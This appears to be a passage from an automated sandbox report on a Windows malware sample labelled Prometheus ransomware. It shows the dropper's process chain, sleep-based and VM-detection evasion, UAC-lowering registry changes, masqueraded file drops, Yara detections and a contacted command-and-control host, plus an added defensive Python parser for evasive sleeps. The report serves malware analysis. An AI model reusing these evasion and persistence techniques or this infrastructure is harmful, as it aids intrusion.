            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\serversessionmonitor\blockfont.exe | Memory allocated: 18B0000 memory reserve, memory write watch
            Source: C:\serversessionmonitor\blockfont.exe | Memory allocated: 1B2B0000 memory reserve, memory write watch
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Memory allocated: 1060000 memory reserve, memory write watch
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Memory allocated: 1AE10000 memory reserve, memory write watch
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Memory allocated: 1530000 memory reserve, memory write watch
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Memory allocated: 1AFF0000 memory reserve, memory write watch
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Memory allocated: 1610000 memory reserve, memory write watch
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Memory allocated: 1B100000 memory reserve, memory write watch
            Source: C:\serversessionmonitor\blockfont.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Thread delayed: delay time: 600000
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Thread delayed: delay time: 599884
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Thread delayed: delay time: 599768
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\serversessionmonitor\blockfont.exe | Window / User API: threadDelayed 1153
            Source: C:\serversessionmonitor\blockfont.exe | Window / User API: threadDelayed 1011
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Window / User API: threadDelayed 366
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Window / User API: threadDelayed 803
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Window / User API: threadDelayed 354
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Evasive API call chain: GetLocalTime,DecisionNodes graph_0-22929
            Source: C:\serversessionmonitor\blockfont.exe TID: 3384 | Thread sleep count: 1153 > 30
            Source: C:\serversessionmonitor\blockfont.exe TID: 3384 | Thread sleep count: 1011 > 30
            Source: C:\serversessionmonitor\blockfont.exe TID: 1368 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe TID: 8064 | Thread sleep count: 366 > 30
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe TID: 7748 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe TID: 7992 | Thread sleep count: 300 > 30
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe TID: 7772 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7960 | Thread sleep count: 803 > 30
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604 | Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604 | Thread sleep time: -599884s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7960 | Thread sleep count: 354 > 30
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604 | Thread sleep time: -599768s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7420 | Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7928 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
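Two sleep patterns appear in the lines above: thousands of short sleeps in a loop (the "sleep count ... > 30" lines) and single waits of 922337203685477 or 1844674407370954, which are exactly TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks of 100 ns divided by 10000) and twice that, i.e. a managed-code thread parked indefinitely. The script below is an added example written for this page, not Joe Sandbox code; it parses lines in the sandbox's wording, aggregates them per image and states why the pattern looks evasive. It assumes the sandbox's "s"-suffixed numbers are milliseconds (the 600000 and 30000 values line up with 10 minutes and 30 seconds under that reading) and treats the negative sign as the NT relative-interval convention, so only magnitudes are used. The sample lines are copied from the report above except the conhost.exe line, which is a constructed benign control.

```python
import re
from collections import defaultdict

# TimeSpan.MaxValue is Int64.MaxValue ticks of 100 ns; in milliseconds that is
# exactly the 922337203685477 that appears in the report lines above.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
# Largest argument Thread.Sleep(int) accepts: about 24.8 days.
INT32_MAX_MS = 2**31 - 1

# Telemetry lines in the sandbox's wording. All but the last are copied from the
# report above; the conhost.exe line is a constructed benign control.
SAMPLE_LINES = r"""
C:\serversessionmonitor\blockfont.exe TID: 3384 Thread sleep count: 1153 > 30
C:\serversessionmonitor\blockfont.exe TID: 3384 Thread sleep count: 1011 > 30
C:\serversessionmonitor\blockfont.exe TID: 1368 Thread sleep time: -922337203685477s >= -30000s
C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7960 Thread sleep count: 803 > 30
C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604 Thread sleep time: -1844674407370954s >= -30000s
C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7604 Thread sleep time: -600000s >= -30000s
C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe TID: 7420 Thread sleep time: -30000s >= -30000s
C:\Windows\System32\conhost.exe TID: 4100 Thread sleep time: -1000s >= -30000s
""".strip().splitlines()

LINE_RE = re.compile(
    r"^(?P<image>.+?\.exe)\s+TID:\s*(?P<tid>\d+)\s*"
    r"Thread sleep (?P<kind>count|time):\s*(?P<value>-?\d+)"
)


def parse_sleep_telemetry(lines):
    """Return (image, tid, kind, magnitude) tuples; magnitude is a call count
    for 'count' lines and an assumed millisecond duration for 'time' lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # Negative values are relative intervals (NT convention); keep the magnitude.
        events.append((m.group("image"), int(m.group("tid")),
                       m.group("kind"), abs(int(m.group("value")))))
    return events


def describe_delay(ms):
    """Human-readable classification of a single requested delay."""
    if ms >= TIMESPAN_MAX_MS and ms % TIMESPAN_MAX_MS == 0:
        return "TimeSpan.MaxValue multiple (managed thread parked forever)"
    if ms > INT32_MAX_MS:
        return "beyond Thread.Sleep(int) range (effectively forever)"
    if ms >= 3_600_000:
        return f"{ms / 3_600_000:.1f} h"
    if ms >= 60_000:
        return f"{ms / 60_000:.1f} min"
    return f"{ms / 1000:.1f} s"


def summarize(events, loop_threshold=30, long_wait_ms=30_000):
    """Per-image list of reasons the sleep pattern looks evasive (empty = benign)."""
    stats = defaultdict(lambda: {"loop_sleeps": 0, "max_ms": 0, "long_waits": 0, "forever": 0})
    for image, _tid, kind, value in events:
        s = stats[image]
        if kind == "count":
            s["loop_sleeps"] += value
            continue
        s["max_ms"] = max(s["max_ms"], value)
        if value > INT32_MAX_MS:
            s["forever"] += 1
        elif value >= long_wait_ms:
            s["long_waits"] += 1
    verdicts = {}
    for image, s in stats.items():
        reasons = []
        if s["loop_sleeps"] > loop_threshold:
            reasons.append(f"{s['loop_sleeps']} short sleeps in a loop (stalls the analysis clock)")
        if s["forever"]:
            reasons.append(f"{s['forever']} thread(s) parked forever: {describe_delay(s['max_ms'])}")
        if s["long_waits"]:
            reasons.append(f"{s['long_waits']} wait(s) of at least {long_wait_ms // 1000} s")
        verdicts[image] = reasons
    return verdicts


if __name__ == "__main__":
    for image, reasons in summarize(parse_sleep_telemetry(SAMPLE_LINES)).items():
        print(image, "->", reasons or ["no sleep-based evasion"])
```

The loop counts matter as much as the giant values: a sandbox that fast-forwards a single huge Sleep still burns real time on a thousand short ones, which is why both signatures fire here.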
            Source: C:\serversessionmonitor\blockfont.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7DD72 VirtualQuery,GetSystemInfo
            Source: wscript.exe, 00000001.00000003.1740625428.0000000000BDD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1632997233.00000000031C2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
            Source: 5P9EdUgv5r.exe, 00000000.00000003.1632927760.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\'
            Source: blockfont.exe, 00000004.00000002.1802492153.000000001C16D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:fs
            Source: wscript.exe, 00000001.00000003.1740625428.0000000000BDD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1835586004.000000001C0D4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{Q*
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | API call chain: ExitProcess graph end node graph_0-23328
            Source: C:\serversessionmonitor\blockfont.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D8866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D8753D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D8B710 GetProcessHeap
            Source: C:\serversessionmonitor\blockfont.exe | Process token adjusted: Debug
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Process token adjusted: Debug
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7F063 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\serversessionmonitor\blockfont.exe | Memory allocated: page read and write, page guard
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\serversessionmonitor\blockfont.exe "C:\serversessionmonitor\blockfont.exe"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
            Source: C:\serversessionmonitor\blockfont.exe | Process created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe"
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7ED5B cpuid 0_2_00D7ED5B
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00D7A63C
            Source: C:\serversessionmonitor\blockfont.exeQueries volume information: C:\serversessionmonitor\blockfont.exe VolumeInformationJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe VolumeInformationJump to behavior
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe VolumeInformation
            Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D7D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00D7D5D4
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeCode function: 0_2_00D6ACF5 GetVersionExW,0_2_00D6ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\serversessionmonitor\blockfont.exe | Registry value created: PromptOnSecureDesktop 0
            Source: C:\serversessionmonitor\blockfont.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
            Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.1825230562.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.1870320993.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1784999674.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: blockfont.exe PID: 7076, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7508, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7552, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7900, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.1825230562.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.1870320993.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1784999674.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: blockfont.exe PID: 7076, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7508, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7552, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7900, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts111
            Windows Management Instrumentation
            11
            Scripting
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Bypass User Account Control
            11
            Deobfuscate/Decode Files or Information
            LSASS Memory2
            File and Directory Discovery
            Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter
            1
            Scheduled Task/Job
            11
            Process Injection
            3
            Obfuscated Files or Information
            Security Account Manager37
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job
            Login Hook1
            Scheduled Task/Job
            22
            Software Packing
            NTDS131
            Security Software Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Bypass User Account Control
            Cached Domain Credentials31
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items123
            Masquerading
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1502154; Sample: 5P9EdUgv5r.exe; Startdate: 31/08/2024; Architecture: WINDOWS; Score: 100
            • Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 14 other signatures
            • 5P9EdUgv5r.exe started; dropped C:\serversessionmonitor\blockfont.exe (PE32) and C:\...\1ogacUYksBebmJ8WSR.vbe (data); started wscript.exe
            • wscript.exe: Windows Scripting host queries suspicious COM object (likely to drop second stage); started cmd.exe
            • cmd.exe started blockfont.exe and conhost.exe
            • blockfont.exe dropped C:\Windows\...\qwhJcOiWbbUoQMvwnJNr.exe (PE32), C:\Recovery\SearchApp.exe (PE32), C:\Program Files\...\qwhJcOiWbbUoQMvwnJNr.exe (PE32) and 5 other malicious files; signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file, 4 other signatures; started qwhJcOiWbbUoQMvwnJNr.exe, schtasks.exe, schtasks.exe and 22 other processes
            • qwhJcOiWbbUoQMvwnJNr.exe (two further instances started at top level): Multi AV Scanner detection for dropped file
            • qwhJcOiWbbUoQMvwnJNr.exe network: a1023624.xsph.ru 141.8.194.149, 49734, 80, SPRINTHOSTRU, Russian Federation

            Source | Detection | Scanner | Label
            5P9EdUgv5r.exe | 71% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            5P9EdUgv5r.exe | 61% | Virustotal |
            5P9EdUgv5r.exe | 100% | Avira | VBS/Runner.VPG
            5P9EdUgv5r.exe | 100% | Joe Sandbox ML |
            Source | Detection | Scanner | Label
            C:\serversessionmonitor\blockfont.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe | 100% | Avira | VBS/Runner.VPG
            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Recovery\SearchApp.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Avira | HEUR/AGEN.1323984
            C:\serversessionmonitor\blockfont.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Joe Sandbox ML |
            C:\Recovery\SearchApp.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 100% | Joe Sandbox ML |
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | 68% | Virustotal |
            C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | 68% | Virustotal |
            C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe | 68% | Virustotal |
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | 68% | Virustotal |
